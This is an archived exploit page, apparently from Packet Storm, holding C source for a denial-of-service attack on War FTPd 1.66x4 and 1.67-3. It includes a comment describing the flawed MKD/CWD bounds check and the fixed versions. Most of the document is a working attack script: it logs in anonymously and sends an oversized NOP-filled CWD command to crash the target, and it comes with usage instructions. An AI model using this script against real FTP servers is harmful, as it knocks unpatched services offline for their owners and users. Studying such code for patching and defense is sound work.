WarFtpd dos attack - The buffer overflow seems to occur because the bound check of the command of MKD/CWD is imperfect. War FTPd 1.70-1 does fix this problem, but it contains other vulnerabilities.
75f5fa10bdcb027b11108ada9ad43286eb50f3575be3fbcb51715841603aff32/* coded by eth0 from buffer0verfl0w */
/* tested by morpha */
/* *NOTE* Original exploit was coded for winbl0wz *NOTE */
/*
Vulnerable:
War FTPd version 1.66x4
War FTPd version 1.67-3
Immune:
War FTPd version 1.67-4
War FTPd version 1.71-0
The buffer overflow seems to occur because the bound
check of the command of MKD/CWD is imperfect. This
means that although anyone can overflow the statically
assigned buffer that stores the requested path, you
cannot overwrite the RET address and therefore it's
impossible to cause War FTPd to execute arbitrary code.
However, it is a simple mechanism for performing a Denial
of-Service against the server.
Solution:
War FTPd 1.70-1 does fix this problem, but it contains other
vulnerabilities (see our additional information section).
*/
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
#define PASS "PASS eth0@owns.your.ass.com\r\n"
#define LOGIN "USER anonymous\r\n"
int expl0it(char *host)
{
struct hostent *hp;
struct in_addr addr;
struct sockaddr_in s;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
/* u_char buf[280]; */
int p, i;
hp = gethostbyname (host);
if (!hp) exit (1);
bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
s.sin_port = htons (FTP_PORT);
s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
if(connect (p, &s, sizeof (s))!=0)
{
printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT);
return;
}
else {
printf("Connected!\n");
write(p, LOGIN, strlen(LOGIN));
write(p, PASS, strlen(PASS));
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
printf("DONE!\n");
}
return(0);
}
int main(int argc, char *argv[])
{
if(argc<2)
{
printf("Usage: %s [host] \n",argv[0]);
return;
}
else
{
expl0it(argv[1]);
}
return(0);
}
/* www.hack.co.za [10 May]*/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed